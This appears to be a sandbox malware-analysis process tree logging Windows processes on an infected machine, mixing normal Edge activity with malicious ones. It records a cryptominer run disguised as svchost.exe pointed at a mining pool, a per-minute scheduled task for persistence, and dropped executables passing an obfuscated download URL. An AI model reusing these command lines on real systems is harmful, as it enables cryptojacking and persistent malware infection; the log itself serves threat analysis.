    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
    3⤵
    PID:5308
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1
    3⤵
    PID:6596
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
    3⤵
    PID:5156
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6408 /prefetch:1
    3⤵
    PID:6200
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6696 /prefetch:1
    3⤵
    PID:408
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:1
    3⤵
    PID:6176
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
    3⤵
    PID:5604
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
    3⤵
    PID:6788
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6608 /prefetch:8
    3⤵
    PID:6868
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7464 /prefetch:8
    3⤵
    PID:6692
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7644 /prefetch:8
    3⤵
    PID:6844
- - C:\Users\Admin\Downloads\MBSetup.exe
    "C:\Users\Admin\Downloads\MBSetup.exe"
    3⤵
    PID:7060
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,17666420202628854388,12917658719529445726,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6476 /prefetch:2
    3⤵
    PID:6884
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3872
- C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
  "C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"
  2⤵
  PID:7452
- C:\Program Files (x86)\Jqbb\ihsdprr8vlrpdx.exe
  "C:\Program Files (x86)\Jqbb\ihsdprr8vlrpdx.exe"
  2⤵
  PID:8568
- - C:\Program Files (x86)\Jqbb\ihsdprr8vlrpdx.exe
    "C:\Program Files (x86)\Jqbb\ihsdprr8vlrpdx.exe"
    3⤵
    PID:8788
- C:\Windows\SysWOW64\systray.exe
  "C:\Windows\SysWOW64\systray.exe"
  2⤵
  PID:9372

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 192 -p 4908 -ip 4908
1⤵
PID:2912

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4908 -s 1508
1⤵
- Program crash
PID:4484

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4088 -ip 4088
1⤵
PID:4956

C:\Windows\SysWOW64\yszjavnl\hkteeaax.exe
C:\Windows\SysWOW64\yszjavnl\hkteeaax.exe /d"C:\Users\Admin\Desktop\2022-10-24\0f4450a6b298d95d7fdd6ac63a917b1975221fe90e520ff30e9c6b0d8a4955b6.exe"
1⤵
- Executes dropped EXE
PID:1540
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  PID:1036
- - C:\Windows\SysWOW64\svchost.exe
    svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.70000 -p x -k -a cn/half
    3⤵
    PID:4996
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1540 -s 528
  2⤵
  - Program crash
  PID:2912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5100 -ip 5100
1⤵
PID:1108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4580 -ip 4580
1⤵
PID:2328

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:1904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1540 -ip 1540
1⤵
PID:4580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1412 -ip 1412
1⤵
PID:4008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5100 -ip 5100
1⤵
PID:3396

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
1⤵
PID:3864
- C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzUuMjciIHNoZWxsX3ZlcnNpb249IjEuMy4xNzUuMjciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MjNEODNDNkQtQTI1RC00MjI1LUJCM0QtMDY1MkJFQjU4RkQ1fSIgdXNlcmlkPSJ7NzhDN0Q1NTMtNEI2Ni00RTEzLUI0QTctNDNGOUM2Mzc1RkQyfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntDOTBEODk2My1DQzBGLTRFNUMtOUE5Ri0wMjY1MTE3MTEyM0V9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O3FXSlN6V3dQZmRjTFIrWEdJdjZ4clpmaVlPeGhQVTJzMU5XbWpXY2FGUGc9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEwNi4wLjUyNDkuMTE5IiBuZXh0dmVyc2lvbj0iMTA2LjAuNTI0OS4xMTkiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSI1IiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3NDIzNTA3MDAxIi8-PC9hcHA-PC9yZXF1ZXN0Pg
  2⤵
  PID:452
- C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{6D2411F1-A148-4969-BBE9-3EEACEE8FA6D}\MicrosoftEdge_X64_114.0.1823.86.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{6D2411F1-A148-4969-BBE9-3EEACEE8FA6D}\MicrosoftEdge_X64_114.0.1823.86.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
  2⤵
  PID:552
- - C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{6D2411F1-A148-4969-BBE9-3EEACEE8FA6D}\EDGEMITMP_E27B2.tmp\setup.exe
    "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{6D2411F1-A148-4969-BBE9-3EEACEE8FA6D}\EDGEMITMP_E27B2.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{6D2411F1-A148-4969-BBE9-3EEACEE8FA6D}\MicrosoftEdge_X64_114.0.1823.86.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
    3⤵
    PID:1932
- C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzUuMjciIHNoZWxsX3ZlcnNpb249IjEuMy4xNzUuMjciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MjNEODNDNkQtQTI1RC00MjI1LUJCM0QtMDY1MkJFQjU4RkQ1fSIgdXNlcmlkPSJ7NzhDN0Q1NTMtNEI2Ni00RTEzLUI0QTctNDNGOUM2Mzc1RkQyfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9Ins4MDBBNjNCNi0yNTJCLTQ2RjMtQUI3Ri0wMkRBNDEzNTQ3NEV9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O1ZQUW9QMUYrZnExNXdSemgxa1BMNFBNcFdoOE9STUI1aXp2ck9DL2NoalE9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0ie0YzMDE3MjI2LUZFMkEtNDI5NS04QkRGLTAwQzNBOUE3RTRDNX0iIHZlcnNpb249IiIgbmV4dHZlcnNpb249IjExNC4wLjE4MjMuODYiIGxhbmc9IiIgYnJhbmQ9IiIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSItMSIgaW5zdGFsbGRhdGU9Ii0xIj48dXBkYXRlY2hlY2svPjxldmVudCBldmVudHR5cGU9IjkiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9Ijc0MzUwNjkxNDkiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3NDM1MDY5MTQ5IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzcyMTcwODE2MyIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vbXNlZGdlLmYudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvNzVkNjkyYjQtNjUzYi00NTNjLWEzNjgtZDhiMThlYzZhZjI1P1AxPTE2OTA0NDM1MDcmYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9R3NYdCUyZnNRa0FwS0hhdlV6Z05HRkkwRVUwdk5CMjRsMnM1bWw0MTNiR0dPMzJldmF6ZnMza2N4c0N1NDlxYUJ4cGV2eFoyZWdDaDAwbXVsTWxCN09sZyUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE0ODYzMjAwOCIgdG90YWw9IjE0ODYzMjAwOCIgZG93bmxvYWRfdGltZV9tcz0iMTg2MTciLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3NzIyNDg5NDQyIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzc0NzgwMTkzMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5NjYwOSIgc3lzdGVtX3VwdGltZV90aWNrcz0iODA2OTI5MTU1NiIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9IjY1NiIgZG93bmxvYWRfdGltZV9tcz0iMjg2NjQiIGRvd25sb2FkZWQ9IjE0ODYzMjAwOCIgdG90YWw9IjE0ODYzMjAwOCIgcGFja2FnZV9jYWNoZV9yZXN1bHQ9IjAiIGluc3RhbGxfdGltZV9tcz0iMzIxNDkiLz48L2FwcD48L3JlcXVlc3Q-
  2⤵
  PID:5712

C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe
C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe
1⤵
PID:1032
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:9900
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\sefanathread"
  2⤵
  PID:2432
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe'" /f
  2⤵
  PID:3976
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe'" /f
    3⤵
    - Creates scheduled task(s)
    PID:6264
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c copy "C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe" "C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe"
  2⤵
  PID:5784

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\da533ce533774e8097dc7e08554728d6 /t 4412 /p 4920
1⤵
PID:3020

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2520

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5128

C:\Program Files (x86)\Neurobiological\theocracy.exe
"C:\Program Files (x86)\Neurobiological\theocracy.exe"
1⤵
PID:1052
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im Ceaseless.exe
  2⤵
  - Kills process with taskkill
  PID:6196
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im Lashing.exe
  2⤵
  - Kills process with taskkill
  PID:8892

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:5436

C:\Program Files (x86)\Neurobiological\Ceaseless.exe
"C:\Program Files (x86)\Neurobiological\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:2948

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5384

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6128
- C:\Users\Admin\AppData\Local\Temp\nsa55A5.tmp\Ceaseless.exe
  C:\Users\Admin\AppData\Local\Temp\nsa55A5.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
  2⤵
  PID:5272

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:5424

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5692

C:\Users\Admin\AppData\Local\Lashing.exe
C:\Users\Admin\AppData\Local\Lashing.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:3948

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\tim94\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\tim94\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=114.0.5735.201 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=114.0.1823.86 --initial-client-data=0x180,0x184,0x188,0x15c,0x194,0x7ffe21264210,0x7ffe21264220,0x7ffe21264230
1⤵
PID:6088

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x150 0x3cc
1⤵
PID:3280

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:5880

C:\Program Files (x86)\Sewer\Ceaseless.exe
"C:\Program Files (x86)\Sewer\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7072

C:\Program Files (x86)\Sewer\Lashing.exe
"C:\Program Files (x86)\Sewer\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:3292

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6508

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7152

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:4488

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:5400

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:4748

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:2072
- C:\Users\Admin\AppData\Local\Temp\nst731C.tmp\Ceaseless.exe
